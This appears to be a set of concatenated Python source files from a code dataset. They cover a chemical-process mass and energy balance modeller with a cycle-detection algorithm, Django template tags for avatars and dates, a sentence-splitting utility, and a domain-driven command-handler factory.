``dict`` for storing the value of the mass fractions. Each entry corresponds to a component. Sum must equal one. Unknown values are marked as ``None``. wmol: Flow rate (mol per unit time). xmol: Molar fractions. T: Temperature (in K). """ tolerance = 0.05 def __init__(self, name: str, *substances: Substance, **info: float): if substances == (): warn("No substances informed.") self.composition = list(substances) self.equations = {} # Actual equations self._equations = {} # Equations checked by aoe. # Name and restriction addition: if not isinstance(name, str): raise TypeError("Please inform a valid name (string type).") self._update_restriction(name) # self._name is defined here. # Composition and flow rate information self.w = None self.x = {} self._x = {} for substance in substances: self.x[substance] = None self._x[f'x_{self.name}_{substance.name}'] = None self.T = None self.add_info(**info) # Equipment (connection) information self.leaves = None self.enters = None def __str__(self): return self.name def __contains__(self, item: Substance): if item in self.composition: return True else: return False @property def name(self): return self._name @staticmethod def restriction(flow: 'Flow') -> float: """Mass fraction restriction equation (sum(x) = 1). .. warning:: As of now, the code ignores the ``None`` values (considers them as equal to zero). No Exception is raised. Args: flow: A Flow object Returns: The sum of the stream's mass fractions minus 1. """ x = list(flow.x.values()) try: while True: x.remove(None) except ValueError: # list.remove(None): None not in list. pass # TODO: should an error be generated when None is still specified? # added the "float" because I may change the type of x in the future. return float(sum(x)) - 1 def add_info(self, **info: float): # TODO: add this info to the equations? How will this work? backup_x = self.x.copy() dictionary = {substance.name: substance for substance in self.x} try: for kwarg in info: data = info[kwarg] if kwarg in dictionary: if data > 1 or data < 0: raise ValueError( f"Informed an invalid value for a mass fraction: " f"{kwarg} = {data}." ) self.x[dictionary[kwarg]] = data self._x[f"x_{self.name}_{kwarg}"] = data # self.equations[f"x_{self.name}_{kwarg}"] = data elif kwarg == "w": if data < 0: raise ValueError( f"Informed a negative flow rate: " f"{kwarg} = {data}." ) self.w = data # self.equations["w"] = data # Add more information in the future. else: warn(f"User unknown specified property: {kwarg} = {data}.") if self.restriction(self) > Flow.tolerance: raise ValueError("Restriction Error: sum(x) > 1.") except ValueError as e: self.x = backup_x raise ValueError(e) def add_substances(self, *substances: Substance, **info: float): """Method for adding substances to the current. Args: substances: :class:`Substance` objects of the substances we want to add. info: Additional info we want to add the the flow's attributes. It doesn't have to be related the the substances that are being added. """ for substance in substances: if substance in self.composition: continue else: self.composition.append(substance) self.x[substance] = None self._x[f'x_{self.name}_{substance.name}'] = None self.add_info(**info) self._update_restriction(self.name) # Updating the restriction function def remove_substances(self, *substances: Substance, **info: float): for substance in substances: if substance not in self.composition: continue else: self._x.pop(f'x_{self.name}_{substance.name}') self.x.pop(substance) # Update mass and molar fractions self.add_info(**info) self._update_restriction(self.name) def _update_restriction(self, name): while True: generator = (f'x_{name}_{substance.name}: None = None, ' for substance in self.composition) args = "flow: 'Flow', " for entry in generator: args += entry try: string =\ f""" def mass_fraction_restriction_{name}({args}) -> float: '''Mass fraction restriction equation (sum(x) = 1). This function is created dynamically with the :func:`Flow._update_restriction` method. It should not be called by the user, but only by the equation ordering algorithm. ''' warn("Do not call protected methods.") return Flow.restriction(flow) self._equations['restriction'] = mass_fraction_restriction_{name} """ exec(string) break except SyntaxError: name = input( f"Invalid name: {name}. Please inform a new name.") self._name = name def _add_connections( self, leaves: 'Equipment' = None, enters: 'Equipment' = None): """Method for beginning and end points for the flow. Will be useful in the future when we define a :class:`Process` class. """ if leaves is not None: self.leaves = leaves # leaves.add_outflows(self) if enters is not None: self.enters = enters # enters.add_inflows(self) def _remove_connections(self, leaves: bool = False, enters: bool = False, equipment: 'Equipment' = None): """Method for removing connections. TODO: possibly remove 'leaves' and 'enters' arguments, since this method should only be called through the remove_flow method (from the Equipment class). """ if (not leaves) and (not enters) and equipment is None: warn("No connection was removed because None were specified.") if leaves: # self.leaves.remove_flow(self) print(f"Removed {self.leaves.name} from {self.name}.leaves.") self.leaves = None if enters: # self.enters.remove_flow(self) print(f"Removed {self.enters.name} from {self.name}.enters.") self.enters = None if equipment is not None: if equipment == self.enters: # self.enters.remove_flow(self) print(f"Removed {self.enters.name} from {self.name}.enters.") self.enters = None elif equipment == self.leaves: # self.leaves.remove_flow(self) print(f"Removed {self.leaves.name} from {self.name}.leaves.") self.leaves = None else: raise NameError(f"Equipment {equipment} isn't connected to this" f" process current {self}." f" It connects {self.leaves} to {self.enters}.") class Equipment: """Class for equipments TODO: There still need to be constant updates of the w and x quantities. """ def __init__(self, name: str): self._name = name self.composition = [] self.w = None self.x = {} # Not yet implemented: self._reaction = True self.reaction_list = [] self.reaction_rate = {} self.reaction_rate_mol = {} self.inflow = [] self.outflow = [] self.equations = {} self._equations = {} self.heat = None # Heat self.work = None # Work self.T_ref = None # Reference Temperature for Enthalpy Calc. def __str__(self): return self.name def __iter__(self): for flow in self.outflow: yield flow for flow in self.inflow: yield flow def __contains__(self, item: Union[Substance, Flow]): """Tests if a Substance is present in the equipment, or if a Flow enters or leaves it. TODO: Add the possibility of item being a string """ if (item in self.inflow) or item in (self.outflow): return True elif item in self.composition: return True else: return False @property def name(self): return self._name @property def reaction(self): return self._reaction @staticmethod def component_mass_balance(equipment: 'Equipment', substance: Substance) -> float: """Component Mass Balance for substance a given substance and equipment. TODO: maybe raise an error if the return value goes over the tolerance. """ if substance not in equipment: raise TypeError( f"This equipment does not have this substance in it:" f" {substance.name}" ) inflows = equipment.inflow outflows = equipment.outflow result = 0 for flow in equipment: if substance in flow: if flow.w is None: raise ValueError( f"Uninitialized value for flow rate at stream: " f"{flow.name}") elif flow.x[substance] is None: raise ValueError( f"Uninitialized mass fraction at stream: {flow.name}") if flow in outflows: result += flow.w * flow.x[substance] else: result -= flow.w * flow.x[substance] return result @staticmethod def energy_balance(equipment: 'Equipment', T_ref: float = None) -> float: inflows = equipment.inflow outflows = equipment.outflow result = 0 if T_ref is None: if equipment.T_ref is None: T_ref = equipment.inflow[0].T equipment.T_ref = T_ref else: T_ref = equipment.T_ref else: equipment.T_ref = T_ref for flow in equipment: for substance in flow: if flow.w is None: raise ValueError( f"Uninitialized value for flow rate at stream:" f" {flow.name}") elif flow.x[substance] is None: raise ValueError( f"Uninitialized mass fraction at stream: {flow.name}") else: if flow in outflows: sign = 1 elif flow in inflows: sign = -1 else: raise RuntimeError( "Unexpected Error." " Flow neither in inflow nor outflow") result += sign * flow.w * flow.x[substance] * \ Substance.cp(substance, flow.T, T_ref) * \ (flow.T - T_ref) if equipment.heat is not None: result += equipment.heat if equipment.work is not None: result += equipment.heat return result def _update_balances(self): """Generates the component mass balances for each substance that comes into the equipment, as well as the system's energy balance. """ name = self.name while True: try: # Pick a substance for substance in self.composition: w = [] x = [] # Pick a stream: for flow in self: # If the substance is present on that stream: if substance in flow: w.append(f"W_{flow.name}") mass_fraction = f"x_{flow.name}_{substance.name}" if mass_fraction not in flow._x: raise NameError( f"Mass fraction {mass_fraction} not in the stream." f" Possibly a naming error (check if the naming" f" convention has changed). The stream contains" f" the following mass fractions:\n{flow._x}.") x.append(mass_fraction) # mass balance: args = "equipment: 'Equipment', substance: Substance, " for w_val, x_val in zip(w, x): args += f"{w_val}: None = None, " args += f"{x_val}: None = None, " string =\ f""" def component_mass_balance_{name}_{substance.name}({args}) -> float: '''Component Mass Balance for substance {substance.name}. This function is generated automatically and dynamically by the :func:`Equipment._update_mass_balance` method. It should only be used by the equation ordering algorithm. ''' warn("Do not call protected methods.") return Equipment.component_mass_balance(equipment, substance) self._equations['mass_balance_{name}_{substance.name}'] = \\ component_mass_balance_{name}_{substance.name} """ exec(string) break except SyntaxError: name = input( f"Invalid name: {name}. Please inform a new name." ) self._name = name w = [] x = [] T = [] for flow in self: T.append(f"T_{flow.name}") w.append(f"W_{flow.name}") for substance in flow.composition: mass_fraction = f"x_{flow.name}_{substance.name}" if mass_fraction not in flow._x: raise NameError( f"Mass fraction {mass_fraction} not in the stream." f" Possibly a naming error (check if the naming" f" convention has changed). The stream contains" f" the following mass fractions:\n{flow._x}.") x.append(mass_fraction) # energy balance: # For the sake of generality, we'll assume each eqp. will have a T_ref args = f"equipment: 'Equipment', Q_{name}: float = None," \ f" W_{name}: float = None, T_ref_{name}: float = None, " for w_val in w: args += f"{w_val}: None = None, " for x_val in x: args += f"{x_val}: None = None, " for T_val in T: args += f"{T_val}: None = None, " string = \ f""" def energy_balance_{name}({args}) -> float: '''Energy balance for equipment {name}. This function is generated automatically and dynamically by the :func:`Equipment._update_balances` method. It should only be used by the equation ordering algorithm. ''' warn("Do not call protected methods.") return Equipment.energy_balance(equipment) self.equations['energy_balance_{name}'] = \\ energy_balance_{name} """ exec(string) def add_inflows(self, *inflows: Flow): """Method for adding a current to the inflows. Automatically adds new substances to the class's composition attribute. Args: *inflows: :class:`Flow` objects we want to add to the inflow. """ self._add_flow("inflow", "outflow", *inflows) def add_outflows(self, *outflows: Flow): """Method for adding a current to the outflows. Args: *outflows: :class:`Flow` objects we want to add to the inflow. """ self._add_flow("outflow", "inflow", *outflows) def _add_flow(self, direction: str, other_direction: str, *flows: Flow): """Adds flows to the the equipment Args: direction: "inflow" or "outflow". other_direction: "outflow" or "inflow". flows: :class:`Flow` objects we want to add to the in or outflow. """ attribute = getattr(self, direction) other_attribute = getattr(self, other_direction) for flow in flows: if flow in attribute: warn(f"Current {flow} already in {direction}, skipped.") continue elif flow in other_attribute: warn(f"Current {flow} already in {other_direction}, make" f" sure to correctly specify the flow direction. Nothing" f" has been changed.") continue else: attribute.append(flow) if direction == 'inflow': flow._add_connections(enters=self) elif direction == 'outflow': flow._add_connections(leaves=self) # If a new substance is added: # if direction == 'outflow': # for substance in flow.composition: # if substance not in self.composition: # warn(f"Ouflow {flow.name} has a substance that does not" # f" enter the equipment: {substance}.") # composition attribute is already updated there^ self.update_composition() def remove_flow(self, flow: Union[str, Flow]): """Method for removing a current from the in and outflows. Args: flow: Either a :class:`Flow` object or the name of an instance of one. """ if isinstance(flow, Flow): name = flow.name elif isinstance(flow, str): name = flow pass else: raise TypeError(f"Invalid type: {type(flow)}." f" Argument must be string or a 'Flow' instance.") # Checking for its presence in the inflow for object in self.inflow: if object.name == name: if isinstance(flow, str): flow = object flow._remove_connections(equipment=self) self.inflow.remove(object) # Checking for its presence in the outflow for object in self.outflow: if object.name == name: if isinstance(flow, str): flow = object flow._remove_connections(equipment=self) self.outflow.remove(object) # Updating the equipment's and possibly the outflow's compositions: # substances = [] # for flow in self.inflow: # for substance in flow.composition: # if substance not in substances: # substances.append(substance) # Grouping all substances # # Present in the inflow # # for substance in self.composition: # if substance not in substances: # # Removing from the equipment's composition those that are # # no longer present in inflow: # Substance.remove_substances(self, substance) # # for flow in self.outflow: # for substance in flow.composition: # if substance not in self.composition: # # Also removing them from consequent outflows # Substance.remove_substances(flow, substance) # self._update_mass_balance() self.update_composition() def add_reaction(self, **kwargs): """Adds a chemical reaction to the equipment. TODO Args: **kwargs: Returns: """ self._reaction = True self.reaction_list.append(kwargs) def toggle_reaction(self): """TODO: update everything else that is related to chemical reactions. (mass balances etc.). """ if self._reaction: while sure not in ['y', 'n']: sure = input( "Are you sure you want to toggle chemical reactions off? [y/n]") if sure == 'y': self._reaction = False else: return False else: self._reaction = True print(f"Reaction is now {self._reaction}") return True def update_composition(self, update_outflows: bool = False): """Updates the equipment's composition attribute, based on its streams. This may also update its outflow streams if the equipment's ``reaction`` attribute is ``False`` (meaning that no reaction takes place in the equipment) and the ``update_outflows`` argument is True. This is to avoid problems when generating errors when creating processes through the :func:`Process.sequential` method. If the outflows are updated as the process is being created, then it will overwrite and delete substances. However, when all connections are already established, it may be useful to use ``update_outflows = True``. .. note:: This implementation is only valid for an Equipment that does not involve a chemical reaction, because it removes substances that do not enter the equipment. For an equipment with reaction see :class:`Reactor`. """ all_substances = [] # Checking all substances that enter the equipment, # if some of them are not present in the equipment's composition # attribute, then they are included. for flow in self.inflow: for substance in flow.composition: if substance not in self.composition: self.composition.append(substance) # Substance.add_substances(self, substance) if substance not in all_substances: all_substances.append(substance) # Now checking if there's a substance present in the composition # attribute that did not enter the equipment. if not self.reaction: # This is only a problem when there aren't any chemical reactions for substance in self.composition: if substance not in all_substances: self.composition.remove(substance) # Checking if the outflows contain all of the substances that entered # the equipment. In some cases, we may consider that they are zero when # we have a complete reaction, but we add this for the sake of # generality and to avoid problems with the mass balances in # reaction-less equipments (because mass balances with reaction haven't # yet been implemented: TODO). for flow in self.outflow: for substance in self.composition: if substance not in flow: flow.add_substances(substance) # If there aren't any chemical reactions AND we have specified that we # want to update the outflows' compositions, then we'll remove # from the outflows the substances that are not present in the equipment if not self.reaction and update_outflows: for flow in self.outflow: for substance in flow.composition: if substance not in self.composition: # Also removing them from consequent outflows Substance.remove_substances(flow, substance) self._update_balances() class Process: """Process object """ def __init__(self): self.equipments = [] self.streams = [] def sequential(self, *args: Union[Flow, Equipment]): sequence = [None] for arg in args: print(arg.name) if isinstance(arg, Flow): setattr(self, arg.name, arg) if isinstance(sequence[-1], Equipment): eqp = sequence[-1] arg.add_substances( *(substance for substance in eqp.composition)) eqp.add_outflows(arg) sequence.append(arg) self.streams.append(arg) elif isinstance(arg, Equipment): setattr(self, arg.name, arg) if isinstance(sequence[-1], Flow): flw = sequence[-1] arg.add_inflows(flw) sequence.append(arg) self.equipments.append(arg) else: raise TypeError(f"Invalid argument type: {type(arg)}." f"Excpected Flow or Equipment.") def update_compositions(self, update_outflows: bool = False): """Method for updating equipments' and streams' compositions. May be unfinished """ for stream in self.streams: if stream.leaves is not None: eqp = stream.leaves stream.add_substances( *(substance for substance in eqp.composition if substance not in stream.composition)) print(stream.name, eqp.name, *(substance.name for substance in stream.composition) ) if stream.enters is not None: eqp = stream.enters if eqp not in self.equipments: self.equipments.append(eqp) print(stream.name, eqp.name) eqp.update_composition(update_outflows) def add_objects(self, *args): for arg in args: if isinstance(arg, Flow): self.streams.append(arg) setattr(self, arg.name, arg) elif isinstance(arg, Equipment): self.equipments.append(arg) setattr(self, arg.name, arg) else: raise TypeError(f"Invalid object type: {arg}, type {type(arg)}") def equations(self) -> Generator: for equipment in self.equipments: for equation in equipment._equations.values(): yield equation for flow in self.streams: for equation in flow._equations.values(): yield equation def graph(self): graph = nx.DiGraph() graph.add_nodes_from( list(equipment.name for equipment in self.equipments) ) edge_list = [] label_dict = {} entrance_nb = 1 exit_nb = 1 # TODO: fix bug (<-F4->, <-F9->) # Actually, we have F4 stacked on top of F3. Analogous for F9 # Think of how to adapt this. A botch may need to be done for stream in self.streams: if stream.leaves is None: leave_str = f'IN {entrance_nb}' entrance_nb += 1 else: leave_str = str(stream.leaves) if stream.enters is None: enter_str = f'OUT {exit_nb}' exit_nb += 1 else: enter_str = str(stream.enters) print(stream, (leave_str, enter_str)) edge_list.append( (leave_str, enter_str) ) label_dict[(leave_str, enter_str)] = stream.name graph.add_edges_from(edge_list) options = { 'with_labels': True, 'node_color': 'lightgray', 'node_size': 2000 } # for index, node in enumerate(graph.nodes()): # graph.nodes[node]['subset'] = index//3 # pos = nx.multipartite_layout(graph, subset_key='subset') pos = nx.planar_layout(graph) nx.draw(graph, pos, **options) nx.draw_networkx_edge_labels(graph, pos, edge_labels=label_dict) fig = plt.gcf() fig.set_size_inches(12, 6) self._graph = graph plt.show() def moa(process: Process, *known_variables): """Module ordering algorithm. Orders different process modules (equipments) in order for solving problems. Args: process: A :class:`Process` object with all of connected equipments and streams for ordering. *known_variables: The variables that are considered to be known. """ def check_bifurcations( stream_list: list, equipment_list: list, bifurcation_dict: dict): # Now we have to check for bifurcations # For this, we'll have to go back on the equipment list and check # if there are any bifurcations left in the bifurcation dictionary eqp_iter = equipment_list.copy() eqp_iter.pop(-1) # ignoring the equipment we've just added eqp_iter.reverse() # going backwards for eqp in eqp_iter: if eqp.name in bifurcation_dict: if len(bifurcation_dict[eqp.name]) == 0: continue else: new_stream = bifurcation_dict[eqp.name][-1] print(f"Bifurcation: taking stream {new_stream.name}", f"from equipment {eqp.name}.") bifurcation_dict[eqp.name].pop(-1) # Getting the equipment's position in the list idx = equipment_list.index(eqp) # We continue from the bifurcation: stream_list = stream_list[:idx + 1] equipment_list = equipment_list[:idx + 1] print(f"Updated stream and equipment lists:\n", *(stm.name for stm in stream_list), '\n', *(eqp.name for eqp in equipment_list), '\n') break # the for loop. else: return None return stream_list, equipment_list, bifurcation_dict, new_stream # No bifurcations left. # Picking the first stream: entering_streams = [] for stream in process.streams: if stream.leaves is None: entering_streams.append(stream) cycle_list = [] studied_equipments = [] bifurcations = {} for entering_stream in entering_streams: current_stream = entering_stream print("################# Entering through", entering_stream) stm_list = [] eqp_list = [] # update list of studied equipments for cycle in cycle_list: _, saved_eqps = cycle for equipment in saved_eqps: if equipment not in studied_equipments: studied_equipments.append(equipment) while True: print(f"Current Stream: {current_stream.name}") equipment = current_stream.enters # If equipment already in the list, then we have a cycle: if equipment in eqp_list: stm_list.append(current_stream) eqp_list.append(equipment) print(f"Cycle detected:", *(eqp.name for eqp in eqp_list)) idx = eqp_list.index(equipment) cycle_list.append((stm_list[idx+1:], eqp_list[idx:])) tup = check_bifurcations(stm_list, eqp_list, bifurcations) if tup is None: print("End of the process.") break # the while loop else: stm_list, eqp_list, bifurcations, current_stream = tup continue else: stm_list.append(current_stream) eqp_list.append(equipment) if equipment is None or equipment in studied_equipments: if equipment is None: print(f"This stream leaves the process") else: print(f"This path has already been studied (equipment" f" {equipment.name}).") tup = check_bifurcations(stm_list, eqp_list, bifurcations) if tup is None: print("End of the process.") break # the while loop else: stm_list, eqp_list, bifurcations, current_stream = tup continue else: print(f"Leads to: {equipment.name}") out_streams = equipment.outflow.copy() if len(out_streams) == 1: current_stream = out_streams[0] elif len(out_streams) < 1: raise ValueError(f"Empty ouflow for equipment {equipment}.") else: print("Equipment with bifurcation, possible outflows:", *(stm.name for stm in out_streams)) current_stream = out_streams[-1] out_streams.pop(-1) # Add bifurcations bifurcation list: bifurcations[equipment.name] = out_streams # Now for defining the actual order in which we'll solve the system # We first create a matrix in which we list the streams and the cycles they # appear in # I have to check for known variables though... # Checking for repeated cycles: for cycle in cycle_list: instances = cycle_list.count(cycle) if instances > 1: for i in range(instances - 1): cycle_list.remove(cycle) # Incidence matrix: inmx = np.zeros((len(cycle_list), len(process.streams))) for row, cycle in enumerate(cycle_list): stream_list, _ = cycle for stream in stream_list: print(stream.name) col = process.streams.index(stream) inmx[row, col] = 1 print(len(process.streams)) print(*(stream.name for stream in process.streams)) stream_order = [] while inmx.sum(): # While the incidence matrix isn't zero: fig, ax = plt.subplots(1, 1) img = ax.imshow(inmx) ax.set_xticks([i for i in range(len(process.streams))]) ax.set_xticklabels([stream.name for stream in process.streams]) ax.set_yticks([i for i in range(len(cycle_list))]) ax.set_yticklabels([i+1 for i in range(len(cycle_list))]) ax.set_ylabel("Cycles") ax.set_xlabel("Streams") plt.show(block=True) col_sum = inmx.sum(axis=0) idx = np.argmax(col_sum) stream_order.append(process.streams[idx]) inmx[inmx[:, idx] == 1] = 0 print(*(stream.name for stream in stream_order)) return cycle_list if __name__ == '__main__': def f1(x1, x2): return None def f2(x1, x2, x3, x4): return None def f3(x3, x4): return None def f4(x4, x5): return None _ = aoe2(f1, f2, f3, f4, x1=1) from main import * from substances import * p = Process() F1 = Flow("F1") F2 = Flow("F2") F3 = Flow("F3") F4 = Flow("F4") F5 = Flow("F5") F6 = Flow("F6") F7 = Flow("F7") F8 = Flow("F8") F9 = Flow("F9") A = Equipment("A") B = Equipment("B") C = Equipment("C") D = Equipment("D") p.sequential( F1, A, F2, B, F4, D, F6, C, F7 ) p.add_objects(F3, F5, F7, F8, F9) p.A.add_inflows(F3, F8) p.B.add_inflows(F5, F7) p.B.add_outflows(F3) p.D.add_outflows(F5, F8, F9) F1.add_substances(Water) p.update_compositions() print(A.composition) cycle_list = moa(p) # Printing the cycles for cycle in cycle_list: for data in cycle: print(*(arg.name for arg in data)) """Output: UserWarning: No substances informed. warn("No substances informed.") F1 A F2 B F4 D F6 C F7 F1 A F2 A Water F2 B F4 B Water F4 D F6 D Water F6 C F7 C Water F7 B F3 B Water F3 A F5 D Water F5 B F7 C Water F7 B F8 D Water F8 A F9 D Water [<class 'substances.Water'>] ################# Entering through F1 Current Stream: F1 Leads to: A Current Stream: F2 Leads to: B Equipment with bifurcation, possible outflows: F4 F3 Current Stream: F3 Cycle detected: A B A Bifurcation: taking stream F4 from equipment B. Updated stream and equipment lists: F1 F2 A B Current Stream: F4 Leads to: D Equipment with bifurcation, possible outflows: F6 F5 F8 F9 Current Stream: F9 This stream leaves the process Bifurcation: taking stream F8 from equipment D. Updated stream and equipment lists: F1 F2 F4 A B D Current Stream: F8 Cycle detected: A B D A Bifurcation: taking stream F5 from equipment D. Updated stream and equipment lists: F1 F2 F4 A B D Current Stream: F5 Cycle detected: A B D B Bifurcation: taking stream F6 from equipment D. Updated stream and equipment lists: F1 F2 F4 A B D Current Stream: F6 Leads to: C Current Stream: F7 Cycle detected: A B D C B End of the process. # [comment] The cycles identified (raw output after comment): # [comment] outputs must still be adapted to only show the actual # [comment] cycle streams and equipments, now it shows the whole path. F1 F2 F3 A B A F1 F2 F4 F8 A B D A F1 F2 F4 F5 A B D B F1 F2 F4 F6 F7 A B D C B """
35.585806
105
0.538906
7930134972a27ddb372f9b29206b46d022e175d6
3,985
py
Python
src/cobra/templatetags/helper_tags.py
lyoniionly/django-cobra
2427e5cf74b7739115b1224da3306986b3ee345c
[ "Apache-2.0" ]
1
2015-01-27T08:56:46.000Z
2015-01-27T08:56:46.000Z
src/cobra/templatetags/helper_tags.py
lyoniionly/django-cobra
2427e5cf74b7739115b1224da3306986b3ee345c
[ "Apache-2.0" ]
null
null
null
src/cobra/templatetags/helper_tags.py
lyoniionly/django-cobra
2427e5cf74b7739115b1224da3306986b3ee345c
[ "Apache-2.0" ]
null
null
null
from __future__ import absolute_import import six from datetime import timedelta from django import template from django.conf import settings from django.utils import timezone from django.utils.translation import ugettext as _, get_language from cobra.core.javascript import to_json from cobra.core.loading import get_model, get_class from cobra.core.utils import multi_get_letter, get_datetime_now from cobra.apps.accounts.utils import get_default_avatar_url, get_user, get_avatar_url as get_avatar_url_util from cobra.core.compat import get_user_model from cobra.core.http import absolute_uri from cobra.core import locale from cobra.core.dates import epoch register = template.Library() register.filter(to_json) @register.filter def needs_access_group_migration(user, organization): AccessGroup = get_model('accessgroup', 'AccessGroup') OrganizationMember = get_model('organization', 'OrganizationMember') OrganizationMemberType = get_class('organization.utils', 'OrganizationMemberType') has_org_access_queryset = OrganizationMember.objects.filter( user=user, organization=organization, has_global_access=True, type__lte=OrganizationMemberType.ADMIN, ) if not (user.is_superuser or has_org_access_queryset.exists()): return False return AccessGroup.objects.filter( team__organization=organization ).exists() @register.simple_tag def get_avatar_url(user, size=settings.COBRA_ACCOUNTS_AVATAR_DEFAULT_SIZE): return get_avatar_url_util(user, size) @register.inclusion_tag('partials/_avatar_tag.html') def get_avatar(user, size=settings.COBRA_ACCOUNTS_AVATAR_DEFAULT_SIZE, **kwargs): if not isinstance(user, get_user_model()): try: user = get_user(user) alt = six.text_type(user) url = get_avatar_url(user, size) except get_user_model().DoesNotExist: url = get_default_avatar_url() alt = _("Default Avatar") else: alt = six.text_type(user) url = get_avatar_url(user, size) context = dict(kwargs, **{ 'user': user, 'url': url, 'alt': alt, 'size': size, }) return context @register.filter def user_display_name(user): return user.get_full_name() or user.username @register.inclusion_tag('partials/project_avatar.html') def get_project_avatar(project, css_class=''): has_avatar = False cxt = {'project': project} if project.avatar: has_avatar = True else: allowed_colors = { 'red': 'FFEBEE', 'purple': 'F3E5F5', 'indigo': 'E8EAF6', 'blue': 'E3F2FD', 'teal': 'E0F2F1', 'orange': 'FBE9E7', 'gray': 'EEEEEE' } css_class += ' identicon' bg_key = project.id % 7 style = "background-color: #%s; color: #555" % allowed_colors.values()[bg_key] first_cap = multi_get_letter(project.name)[0] cxt.update({'style': style, 'first_cap': first_cap.upper()}) cxt.update({'has_avatar': has_avatar, 'css_class': css_class, }) return cxt @register.filter def timesince_ago(value, now=None): from django.template.defaultfilters import timesince if now is None: now = timezone.now() if not value: return _('never') if value < (now - timedelta(days=5)): return value.date() value = (' '.join(timesince(value, now).split(' ')[0:2])).strip(',') if value == _('0 minutes'): return _('just now') if value == _('1 day'): return _('yesterday') return value + _(' ago') @register.filter def absolute_url(url): return absolute_uri(url) @register.assignment_tag def moment_locale(): locale_mapping = getattr(settings, 'MOMENT_LOCALES', locale.LOCALE_MAPPING) return locale_mapping.get(get_language(), 'en') @register.simple_tag def now_epoch(): return epoch(get_datetime_now(), msec=True)
29.962406
109
0.677541
bb134329973bfa0d6a1f2685165d0cd29ba44759
1,038
py
Python
Utils.py
YungRAW/ComputerScienceLicense---PlagiarismChecker
411199d4d8cb33dbeebc0f204c46d74c976fb9cd
[ "MIT" ]
10
2020-06-29T13:18:22.000Z
2021-07-29T02:19:54.000Z
Utils.py
YungRAW/ComputerScienceLicense---PlagiarismChecker
411199d4d8cb33dbeebc0f204c46d74c976fb9cd
[ "MIT" ]
1
2020-08-20T17:29:31.000Z
2020-08-20T19:43:12.000Z
Utils.py
YungRAW/ComputerScienceLicense---PlagiarismChecker
411199d4d8cb33dbeebc0f204c46d74c976fb9cd
[ "MIT" ]
2
2021-08-24T18:57:20.000Z
2022-02-17T00:31:02.000Z
import re def split_text_max_words(lines, max_words): sentences = [] for line in lines: splits = re.finditer("\. [A-Z]|\.\n", line) last_split_idx = 0 for split in splits: sentence = line[last_split_idx: split.start() + 1] if(len(sentence.split(" ")) >= 5): sentences.append(sentence) last_split_idx = split.start() + 2 sentence_splitted_by_max_words = [] for sentence in sentences: words = sentence.split(" ") for i in range(len(words) // max_words): begin = i*max_words end = (i+1)*max_words sentence_splitted_by_max_words.append(" ".join(words[begin : end])) if(len(words) % max_words != 0): begin = (len(words) // max_words)*max_words end = (len(words) // max_words)*max_words + (len(words) % max_words) sentence_splitted_by_max_words.append(" ".join(words[begin : end])) return sentence_splitted_by_max_words
34.6
80
0.570328
0c51ba6c79548338d911c506b0cadf274268e327
3,102
py
Python
src/protean/core/command_handler.py
mpsiva89/protean
315fa56da3f64178bbbf0edf1995af46d5eb3da7
[ "BSD-3-Clause" ]
null
null
null
src/protean/core/command_handler.py
mpsiva89/protean
315fa56da3f64178bbbf0edf1995af46d5eb3da7
[ "BSD-3-Clause" ]
null
null
null
src/protean/core/command_handler.py
mpsiva89/protean
315fa56da3f64178bbbf0edf1995af46d5eb3da7
[ "BSD-3-Clause" ]
null
null
null
import inspect from protean.container import Element, OptionsMixin from protean.core.command import BaseCommand from protean.exceptions import IncorrectUsageError, NotSupportedError from protean.utils import DomainObjects, derive_element_class, fully_qualified_name from protean.utils.mixins import HandlerMixin class BaseCommandHandler(Element, HandlerMixin, OptionsMixin): """Base Command Handler class that should implemented by all Domain CommandHandlers. This is also a marker class that is referenced when command handlers are registered with the domain """ element_type = DomainObjects.COMMAND_HANDLER @classmethod def _default_options(cls): return [("aggregate_cls", None)] def __new__(cls, *args, **kwargs): if cls is BaseCommandHandler: raise TypeError("BaseCommandHandler cannot be instantiated") return super().__new__(cls) def command_handler_factory(element_cls, **kwargs): element_cls = derive_element_class(element_cls, BaseCommandHandler, **kwargs) if not element_cls.meta_.aggregate_cls: raise IncorrectUsageError( { "_entity": [ f"Command Handler `{element_cls.__name__}` needs to be associated with an Aggregate" ] } ) # Iterate through methods marked as `@handle` and construct a handler map if not element_cls._handlers: # Protect against re-registration methods = inspect.getmembers(element_cls, predicate=inspect.isroutine) for method_name, method in methods: if not ( method_name.startswith("__") and method_name.endswith("__") ) and hasattr(method, "_target_cls"): # Do not allow multiple handlers per command if ( fully_qualified_name(method._target_cls) in element_cls._handlers and len( element_cls._handlers[fully_qualified_name(method._target_cls)] ) != 0 ): raise NotSupportedError( f"Command {method._target_cls.__name__} cannot be handled by multiple handlers" ) # `_handlers` maps the command to its handler method element_cls._handlers[fully_qualified_name(method._target_cls)].add( method ) # Associate Command with the handler's stream if inspect.isclass(method._target_cls) and issubclass( method._target_cls, BaseCommand ): # Order of preference: # 1. Stream name defined in command # 2. Stream name derived from aggregate associated with command handler method._target_cls.meta_.stream_name = ( method._target_cls.meta_.stream_name or element_cls.meta_.aggregate_cls.meta_.stream_name ) return element_cls
39.769231
104
0.618956
6e4269d20691bbcaf70cd315b27ff53c65700a19
2,161
py
Python
core/windows.py
9526xu/wenda-helper
ee61f480da42002f53345529d0c37f6fb122a3a2
[ "MIT" ]
2
2019-12-13T06:31:38.000Z
2020-03-17T07:20:57.000Z
core/windows.py
9526xu/wenda-helper
ee61f480da42002f53345529d0c37f6fb122a3a2
[ "MIT" ]
5
2021-03-18T20:24:53.000Z
2022-01-13T00:42:04.000Z
core/windows.py
9526xu/wenda-helper
ee61f480da42002f53345529d0c37f6fb122a3a2
[ "MIT" ]
3
2018-03-15T05:25:38.000Z
2020-10-13T04:09:11.000Z
